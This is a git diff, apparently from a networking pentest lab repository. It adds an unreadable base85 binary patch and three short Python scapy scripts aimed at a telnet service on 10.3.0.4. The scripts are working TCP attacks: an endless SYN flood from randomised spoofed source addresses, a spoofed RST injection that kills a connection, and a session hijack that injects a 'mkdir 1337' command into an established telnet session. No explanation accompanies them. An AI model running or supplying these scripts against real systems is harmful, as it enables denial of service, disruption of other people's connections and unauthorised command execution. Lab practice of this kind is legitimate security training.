ziQXIxPzI=fAm6j^FmLrwy&n{w#qpAGQhVzoG^sLoK?Phg5kTQr80x%537viO0&c&p zUNSW3te$W(er7xW>H9hXIFI@jxU4B7)FRpWO2w_d_zr|WKd#kfjh)xzdj|D?|8z)i z`o~v7&aaNG)~|Zl{b_!n%TsTF?D8@GPAf8W=3ArUaY=0p&_HV#CYyw9gj9VsrtM3_>)1Ec9qq?Wh?1a5D_PWQM{ryVc zsi6Ph&!onF4TNiUlY~$<@$j6}fj`e}4_1Z{oUO^9Od%ifV^3lxF8;fj23Q)MN3E!HiFEdRz4o`(M92!B zdl3Biw^ZJsQN2p1;-Uun%%E`AbECmFb-XHYe)&9?)6HfU^iZBju zHe*RL>gQ`SVR+qGZdmw!Av9jJy*}>c?^#6_C1szrfmcd4%a@B{gvVzy2TvK#%DcX! zSa4%VyMKw6c6w3Tp6pCvk!JbcY#jU}b?}%Kr;5)fklNncE|>Ld@R-b7fv3!kc6sp9 zAT7XJIiLt#u3dKU`xx@ks%)25uwCG&ZNI4L3Br1^;&p-Eb{pmX4Z%A8V;+f9vEs_< z*UQy=fH&aB1>j^J=w}J^n%{=*JqNe}Hk8ecnuagMWO2nB-(;mCMiE6Qsv}tpd(200 z4jg&NelnUv{0J0F8x*cgJ#p4&p5aJ30CrerJYuS6(Jlj^CIDy-J8bgSVgy1oAR(Pirdg~ejXV0JKV)y>EHxxpdl3HpE&F1BQ7tB{2~p#+n|?7(tu}k-@>#ByvT8%KBr!5Y z9K0kqXL(_f;CGKn>C>0+1shGnm4hTf;noZ)<^R?sez^8N31!eJ!2|hVL*a+%Kf}=+ zE<7G0$8O43y28|xOI>HOrbOQ#<}h5=Y%YqK-O4`qiJ9;gU%a#eu^%fi!FIfQp)}Tf zL4qmDwi@G0oBKqdZZikQhJ<&l3r_8L$X|~cL{^h_{3t^9o=~v?oLoIu2oZAa_~y!m zsxHKtId!PsT4S~_XzZr#%dUu4~vFr$vD1Ie&M!>}|pCPJCNZY*9+d}Ib z#jj!lgi_mPbHTIca3Fu@QWO$HO89qZ&F;|uKJZLM6N;pCxw)H?W@RcP^`j9@f!vVx(p=6pQjvKO`( zH3}tIUR`(D<*wq|1M9)v8Rez;<6ZyKRU`SmX`LXDVl4sF{>Nj4lNsaxle(=9s-f^V zp%~v2oR@F}+<%iKJafSPU#cVABBD{?k{v+-1qsamPM8fvlk((`-2b6L!o$0{;j(u! zdZDfctpJlhr4tIrR#V@Gb>Pbvx z&EuT|F?OvVMo1UDZsLX)=ule;9rnwp!3=M)ep$hllk7Y$KjAT_fTVy5N0Rp^HByD% z5Vy%SZl$V}OxUiyxjMk8Px2x=VwftXm~6oQGey*Fo=ID3u?_9&SpTOhSd86zwI8u2 z=JU&TqGf^D7h#V*q}vhbf0ed!#OyU^6uZoC(j?WU)-h$-Ysl&n@s~u*H#ht{{)&q9 z_6Eg5ttV|ZV4P<4X$Yw{p5!Rne&*f!qvLYEeG^W4{S=B6iCiXT+y=WdyU(|YtM0qb zf~vFmL<{@LVl5rlLqS})L%NKowuaDz`MAOhy#%?D5TQ(Kz0`8-Gnea{F}Z51%WJ}U z>QG-!{Tolm?C2V(TW`~eaKXs>y|aF}+|qNHEZ$}CcHvg*gtQ9f3i>LYg3tASj4_h7 zsmJJ7Lq%AB4f17Ea#Dx4yUcv-$$1Pp?4<2R4&tQzXPgItd55Zf=W{@IH1XS$ zF3Xm;OC_EBmheBth~uEn$N#UruWX8=>!J-INP>hwaG793aCdufhXe@@ z!7VsJ2M7?{0)sO!gdo8+xceZ3CAhoWU;_i(d8_V!xLu^*GG(7b7T-Sr?w+;#M&@~oncJP=3d$fAH+2B<^ADJNE;!kUqa9lqSPkHuaaSm zAjJGZZ>BL5)X97XU$t2@d)8rqJ8dYW(%0Flj!;^wc>S$NBV>oKf@@Q&3WHIhnmc1h zxs(z)n{+HpLSlrTJUon;uaS4&a-$xP0X!p55>s5*-Bz-gpfl;tl$$54r@P&S+dM;0 z0p}T9g4NP6pX^K7&eWi&7Q;Lxqi|N%wn+96;~Fb}rTWq*t`$%R<(eu zqi{na>J>D2i2@+#7^<}zY)puR?{y5lrl%B5q!f6fa_Qq5xDhlPhz$4*$_RvQ3v3K-*c?kYQ(8`AWYGmj8y;+p z(nTUSK)7E;*MhtAWcerBzZH{YjET(j-Kgg1*5nbVYLBkn+pS+(6UxJVS_f*mLFba# z<%#l3$DxBm2&{sfj5zP{2U6~i4>$x_fn5DJO1HQFRySS;-{V)<-K||(^&7IaM@Oy; zl+YRlPEi0G7=+gwCK zy%ih7S%^T}?lu=+f2p4ss|{~Sr*eXWT~lCavpw9W?C|Y$7@{@b$`dVtO)61;^tdz= z>0d6r_1@`YbPEc=Kj6n@l=MLN_cGi60D+2WFOfwN(Lu36cM;09QTvr{ep)NsNtY6b zm~l@OzIt0M`lXv zTF-}{ceT0vmxIkPM^{T{*i{n$pKH=|mT8D&F+gWwHA$>pUD_8|ZSX?eeCEcRui64K z>MBUY1eJC%jjej7NuuC;_#ATvgSR%<;iO9-X>C>tr>KQe>d9(LSC<$lEB%_HM(%*X zBL>#Yg~)n6`s3k%3(;Qok7`~kQvM)-1DgR3Lw+n8NezVVVX2#7&_weI<>)GHMUIVh z={53F+^##__OhGuUbt~+$Ebc_@JnMP{VON8I_OjdiWmpBFv=vvFH%n88qQK5J4r-# zcFdDnwR3Hv#)s-QmJXwgmT}~ahHjt%7{REVC`1Dfgg4lwTt`O0grz~DtR?>ZcRcWhXeeZlm{8s(K#xEWqNRDC;gTk6$Z3ZM-ULtwyDQm_Ywm{J&_MX zqovh&%k81l@uY*wJ1*ti6*2N}o3Ubf^N8{F{=|sSnsd%3Pn5H+uUrf1KWkE7x?Iyd z-Y)K*>$8R_0n{d^dg9)C`8=;~59SxBntj#Y2klz8l-+GNPT#t^p5d~t9BfF<2KnMqiy5ebsw2T5i!?WV2_W5R(%-)qa$}8+lMu* z4*sP-OA7GIHXcq4HtCuD z;+18?(#ZrJ&l#X5x^#hwZqckdz}6m{IUKa;O{wnXAQ3b@c2Qr8-s{1~!^M{{IG_%1 zz}Kv&8O_b7Z<#99r@-VoQL$*0R74@tJ}5iS#HGQC-Q>AHsbnr$)JUVI{-~RUBXg+o z6pv4N&fP4VZ7x8p;Pmoq!QrhX>Ka^A@rCzbVdYE^+Fp7q*R?%rjxOC+21M|2LCA7_l`)| z9+**8cW{2_OvSx)M`X)3M4e0RL=IpjncEpLT5`jWB~<=%J?F@@62?sXIQV>Nm5V!-SgEH=Npo=>hC=dDKM z@r8R45_J-TjfMM-`k~Rgik=$(f zSRwO|=QeU) zd;k|)UKeQK@^%{Ui4!trwTE>IWW^u96b5)Ie3Ps@3j!$pV00Ab&C4y&t!*+I7+ z0dYySs;bH)3YqV5v%@gr(c+vLJhu;;gb|G7ikowz-nXb!?7bEs)lY5Rhm3%xKm8c}p0M0w;F1TW)F!a+UN!h{t5VX93Tir{o z*&Jy8G9&&`8yLJ`h1Fod0Ukk@xKk!Ijs^h&NT~TwO>i!Sp9ByXaga!b_JIAU>R^_tSp&5!@4x1bKeJYZ>L){dJKXb^oQ6jC3%DcF4`R zMkao-oL_u)VfeFLr&3*CERnzVG%XP)Ay(bE{PxE|7!97b^0@2ji>kkX#48n>R}OD> z`?f14s)MLOqW^GqM_n;l&$4esrI4HK_B^~V9)&O5*&P85jPZLHU^MTX_i260#kmB-fZIe!nNa_7Bjr7R>LASf~wR#pEj-8DNCO`E90dI zW;o>~kh}O1q{_7EwGrl(0Esm;&E6>FPVZ$ERjZ35V*eo@1&LnQkXDGdMYyfC=qisv ze~aLZ+lMY(`R6UhOz_EpJJIqezCb(*E(GlUsHtP`us;)|igycs_qX;_^u3~`Tf6>*?-4JJzuVM%xtB4q zc+6UVx|$H^9##>R*#h23op6XxA)w62^8I7 zg_)sb{H>b9WfM!NaxaW#hw36Q((s@|yt`%E-CeStja||EIp`_|n@tA)v_7#LjyLeV zJ5}V@swp4Npxm0$S|=`-Ve^r7bLWaj)!0IJsqge>P;`Mp&mG3Zgr54X_3c0!eHymo zDv&}#4L|kY=kNq%=0w}j`dyoKx-p%W{H*S>C+rqBl$)f=|~r< ztjDkNOPcL!l;-~y@?9<|hM zM8sXdn%YAqf>uOC>uuJ0azJ0%QzMyeU}`Mxruv~q0!51B#}HNlc)pRo5XpggS|Uo3 z-@o%%PrLbb0$Kus>EfO1MMF89Hd1pp`s<<-_vJSyL$ov_my_GZsO&VD^EAUzI8G@&~(RFchBFb`LBO6i$mmZ zDh!CSM+b~NKX*P*ZI@Y>M;k5#X!mK`2DEGCc-N`^gst0ZJPxIwfXA}FkoIt&TaWY9 z0UM3GPku9Kz@xiC*9yvAHHj0x+?844IsWaM5L+l zzy~x})r{q)2YB2%1wMaD^05)GXUCDUg!^<_zCs?o+M|zX?79E2BiAg=Tf06vb)8D| z(5f`#=QM&$A1O3!Ue@L9#XR_r1W6}*O5tn=lLv&(mkbD*b|G4hfD8PR?{Ioj92WOb_l(aWk43B6}tG&5UfYU7Z4R>?8SL()7nRSEQIW@%2 z=H*=hy+pz+kbp|-k<|Rj^<>s=5j&;~+h*gIChg#@H~G`C@?zVUsymHra`E3_F97wX z!cd6GP=21HF4w(OFuSYLW@TMQ@U2vdM=Q6Ik(7$@-Q;*X7pZvF?pj5@#v|V;)K=-# zQAFTWe)pd{bF3G=$A2?=-h@{_f0^qmf>Q5tZdi3w(yMJCn+a~9Hhw`z-!&;q&PZsAgWhr>vG6C=Pw;npv*V{`Inu1zV^z5{KKbb(bi{8|= z(K=@d=Fb!dG(mKk{2h{74dy!}0R99Pdzy>Jc+#!aY5&@tbXxQ42~KD8gYKi%7X#A2 zm!mewU08>m`Xk&m+k5_uOWNx$W@1aq&0E=D)Qpu=9Yn<1dwd;N;pn`}DBdEfv!dz6 z*Ep#O)ks(S1!Jbzjl(g4?uKWp@zW^Mq`6ppOex4U9Fq;6w0=^ln%Ro#2WnJmH{b`e z+s$nGMQ*50Sf95W-)9RpPm2*Q)lY5R)*T(`D`2!9jJ zWCyVe04TLlef`|WJAL`%BJ1NOs^vXQMEcDy2abQ0*JN!E`o9e*9cQsxizYn9Xi~=c zIlCW3FkGUSlvuiTq9^n%dqpB+++7$3{JQW4kjCtrZM&qWn92dqgbP)~YF{ee%j)q? zu5=UW^&~8{_K5_H@H#tF>=st>z$rbBC)3yCGS=spe+Cg$pJL){1^6dT*S)iT&(Vno zTZq3sx9UX)8YahFY7MrI{;HrSE*mzzLZgb7zkgg4Tsy}NJ&vTJMI#)y!B=}y?!vBa zjKJ{70o6o(?OJ!C+;zwG%UX9$P9As&I1@B+jhWq?cuEqyDN)>M)Jxtg;Z}M{f9>DF;;DtAu3&F2U#V2hvSmQih_{QO51;K~!j9xEwQL?K4Qbw+z z0dxKak~Q~j;S~K{PnWNU^(!_1EC4KKyJBY;dkg}&unbQO)k)Z1+T8OCz?2 zS6?W0r@@flvm(#N_xq`LsdCJ1APAUdJiX8X2a6B4MUXl95u3u3kX03AAXZJj}rlW8Y_oQ-Behe#+9&tYRiWE~(CpB&Awo{Sji1WYqeKjphR_kjj5?RG8Y5ui?pPBn# zM_nI4tJt>4#$vW2-4Tj!(_lw=kdfw??oA~e3EBIn?p~!{Q7U!0oFnVSYX~@|8hytt z&Q@=F-lKhN_2oo6JiVhJB(pjR2jVA7A#XYjp3Y)b*)EV$LDA=w~j2DK?GLTG~I=9auUr zzKgF{Lr`dU;tSHYT+ByvXq)}5Ut(b@-&aTTrN39K7V*^nG*$~#(|A`X^4mW7G;Q7< zk2)D=i*1|W8j+9vIeoVpbJ6?1fiPos%w>V+!$=|Gl2x#z=zus2OECiNIbv zUV7Uaav!D29sb&W2y@e74)4<>hCLG=CEJrp^vKM!wAw zd|Sspt9RQ~P_Jtz*WHZomBr$$<<6y5L2#`BcsrN{xBfe?gTU$2S0fxkU+ z;$Q+q%;@DQaO0xcPVT`I3jEa7u-R+^|f$7kV80J)nE}iqfqPUWsqnF8GNsp8p zoqMD$Uy%hRO+cW`o}QXVNt4R08_QCu0MlnbiKKpfSG$~yA^BjO6<48HL45#OLOUgO z632O^vK7=KP9oW68h5u?(Zk{R{arove`iIAr4*uJtzdb7m&!3L`j`txCL%bQGhqYk z@d=CLm{uqa73h(*Ye%bw&70{e(njiGGI1B_maRSc%7dJSzuxS zzXaOY|E2$KxZ5!@gbYm3LiC)58TpPzZ;akh6X>P{V`v9g2;mrean7rPJ4u_b^M3|9 zfr_Al>9a7Z5)KQL8d(*Fq{Izu4>*U1RDSpwPop!zr^4^=E;Xl5j*uAh)k!qTE$COttg)=r;2r>v zA}@SWQjirOAFRMs8syWs_z==D(++}n6Za$S@R9B8$p9{@74v?~rx5kNNhr}FD4z9c z5|^y~OsrJd%Cowqqe)A|^6w?_5F&}6G3LZ078QvfBC&q&Y_fn*K3I@{;t<}) zrMCMyhTq!f(C>8xzcAyS?$1kjHz7$X{@UdNcwx3Jc(jCTndb_$$u;G{tT@%?8MS;qdrx+Q6x;4Bcm& z8+-t}$#kUQnfWLki74%FmkP1*Qxdo>uZ{_Bavq+2H4(-Qe&zakVZDAfOUD=$_j&WU`amcJGn2 zwA@fp9-*K0wXxoMUUVDl{#XsDgBKZ`TuIF~5d8XOU%fjqcBJ}4gp@$&k5c~qYYlT< zq2^3?dD9lfzZzw;y*4y<$1Gd|B~vMthxyScvuQ-k1$WP-7#j;1*oi(_@w8UH<{Sh7 z2a-{I`LO&%MSOWR>3Xj$P)L-*vctzpX475cF_B%hMNbQ=UL%n+nXotC$vP4a2<>|O zN#18IIZlP73n0(&vOvE+fWt2zfEwPV+iIPrDr6c7j6wsdV5=E)k*-bD>$6&G@4@zx zr5K@-b0Bai0oC(inyE9J*g|(`@F;8_g3+^xM;w&3T1$ z(&6B2YJ-{a%&g$@aGg$@FKwwV@@3~geZR|1Wjf3DzDjrjdL$?Y4B4fV@t1`${*yWy zYm)R)9tr5HXa`g7%o9T`vga%hCW|j_2iOK04~JQP3ArgR9n__`HrJMlR~*b)%sLVp zTS1dEJ);9jq>KIpu=rO-ZJ?1kKPw{DNkX?>y2a9LmT0O2>m8_i$hKx#3yZTi*NNI6b*=Zy$q_ED$+4eTNi!s-IFaAQ@RPVv_5ZHE3 z`$y@Zq+&NQ9HOgT#bIL`5Ww~X!x%qboMZGG-AxMy`|wn0NJ^C+sHFd!jZ)X#UXOMF z?fm<8K%m6)l#L@XlDIo{U~%cNuaL*PWV&krixw0wZ_lJXdU^d;_)r6kzvr^)9b-uwlwf+#mr#8&T_nJ#auRa%@ejOSS;=dW97q!RK^gyALO`zj!gZ)xkKMEhs9OTvis4Avo_UWPFk- zC@Rr}>AV!Co(1Y{T7tX>0|R1!;va>V*a>jax{)`GaT;R(l z6u0wWI{#49>=D|z{nTCALcS~{wU!IVYe(}KPZJc>?m1-B3zftu^^OzaAk07h-LsaL z#9TcBy={-`Q`>dsBfJ%1{dr`<#f%YO74&_T5-J3jt`C1-^xNm+kxai=yiSxBgx-$@ zM^WYwtVWsgU}Xs~z8T3YWBlucuhI8gY&NpUQV1`uo|ntE?fD@mYu)2}-bqD8mBeL^ zq8UScH$mRw4okE4ZiUCr2Z}jwofE@^5oxaNXqiW3t7XeJsOaDR6#mi*+Lt-^P|YyG zWsPlHJcbw0q6!30l=@Y^E5BYjaj2W5;H7Nt9a2EMZ zvhLp+e1&LN^}N7Aa6C4-s`s-=d(Bn{fK_Xn&JY5-b%66cDut2dCy}UWuM+ zMw=JGL2%b>b-Nh{Mk}##mrCHA{zc#ik^o`pwl;}#H}{`56HL?aX4pWv-cC?jy?>%l zkYR2XRKY-KZJZcm1>S-&=5R3aOq_+a&VkVcB5_7n6HZ&Sn+pKDfoO7`9{Gdxev&MA zstbR?lXtaoXcW`+-yKKQDB>BZLjGL1_g9*T4nOopjwi?)w__TA>|oTgQeNOs)`C3s zR56>a+*Wmd>~>~Q<5I)$TS;AJAFS!&7nT-;4V|G$^YSHm~cPBMkn2>SOB5-!uJE$Xet6_4! zCz!4q5VY zazd5l2zmw&#q5!>_+n?EVKwt4T#(PmN z6Ah`%ra?a0*yI{X*Uv5SwW=a{F)ao(s~0YJnejJ4J9xamLo9i=AtBn8Rpj_&n1GL; zA>m8%qPwaT3m8krLswTJegS;~TSy@^t685mL zu?cvmC-rQ#>zqS^toL{hmk@rS{2@;ogV^q|0|SJDnar57YZgpLOE!c~jAQfq!h;f) zS$_xjzZ(!e?vo`WJWo$3gBWj&uFitJ8PjV}CLzjrqBqSxAXfT^MdGy`#gVR{IQ)kg z9qqy~uq><(Vgd{O8Aj2u=0rG1L5YBAwRZRC#NtxUg*2E=QQjQN?^@s)a?&Qgm~P&N zmMbSj#@mgqsi?08Mh1kZXAf+a85;`z#G#eQo?dFjYiFslyNM5-Kl7S$Ikh=%3c=5; zPm5or3SoyXEz8c`uDtLMm>zCr<}_~FI9PzB(S>+XR7Z`?0uEf-ho#4-TbUwo`0I_| zbrAmwd8}}t6#%D_lSDN)C+3hWPPC+U_PMefA?u3{m3iSeG5qk7r3G>5d~XCl!{rNd zz+0~Cpv=*?$=6yWu%v`a=o_^ENMrk+hy(uyZ|oL5Lg?fD4qr*JbdU>OQzKxY@6Q_( zwv+{t%46fMQ5iYP_6-3$jp?oCsY?@}WiJQt#zF2|BsCp|%7G{z0tSJ`^mJN&*9?7{Jp598kk@c|$7fBA@-e43nPSg*snr6K0(e@|?4XL-zg|JpK-qsJ`ussQ{ zkW?UEK8&R!qiarvWGu^M&NmvUi?~Xk z!fTzj-SBe*rl^=MtR1r4Fgsg+o+wsdAnE;zp0Se(!lgxsH3r`6Cg7S?qTs2k^A}*2 zedK_8Dav_tf(lAGNFj~HdUN|+(LZ;Kcl%F4s=Q3*c#d&UcEG`>p=kA4CO+pDE;SE~ z85^m{B(on{DPlK;aTm}et)Q4zz~X>zF3l6eIf)Yac;#bp{_>ntK!rS20 literal 0 HcmV?d00001 diff --git a/pentest/01-network/01-tcpip/02-tcp/volume/opt1.py b/pentest/01-network/01-tcpip/02-tcp/volume/opt1.py new file mode 100755 index 0000000..00e8a63 --- /dev/null +++ b/pentest/01-network/01-tcpip/02-tcp/volume/opt1.py @@ -0,0 +1,15 @@ +#!/usr/bin/python3 + +from scapy.all import IP, TCP, send +from ipaddress import IPv4Address +from random import getrandbits + +ip = IP(dst="10.3.0.4") +tcp = TCP(dport=23, flags='S') +pkt = ip/tcp + +while True: + pkt[IP].src = str(IPv4Address(getrandbits(32))) + pkt[TCP].sport = getrandbits(16) + pkt[TCP].seq = getrandbits(32) + send(pkt, iface = 'eth0', verbose = 0) diff --git a/pentest/01-network/01-tcpip/02-tcp/volume/opt2.py b/pentest/01-network/01-tcpip/02-tcp/volume/opt2.py new file mode 100755 index 0000000..f7e9de5 --- /dev/null +++ b/pentest/01-network/01-tcpip/02-tcp/volume/opt2.py @@ -0,0 +1,7 @@ +#!/usr/bin/env python3 +from scapy.all import IP,TCP,send,ls +ip = IP(src="10.3.0.3", dst="10.3.0.4") +tcp = TCP(sport=55418, dport=23, flags="R", seq=3707590235) +pkt = ip/tcp +ls(pkt) +send(pkt, verbose=0) \ No newline at end of file diff --git a/pentest/01-network/01-tcpip/02-tcp/volume/opt3.py b/pentest/01-network/01-tcpip/02-tcp/volume/opt3.py new file mode 100755 index 0000000..48bdc97 --- /dev/null +++ b/pentest/01-network/01-tcpip/02-tcp/volume/opt3.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python3 +from scapy.all import IP,TCP,send,ls +ip = IP(src="10.3.0.3", dst="10.3.0.4") +tcp = TCP(sport=60124, dport=23, flags="PA", seq=1386786213, ack=482847772) +data = "\r mkdir 1337 \r" +pkt = ip/tcp/data +ls(pkt) +send(pkt, verbose=0)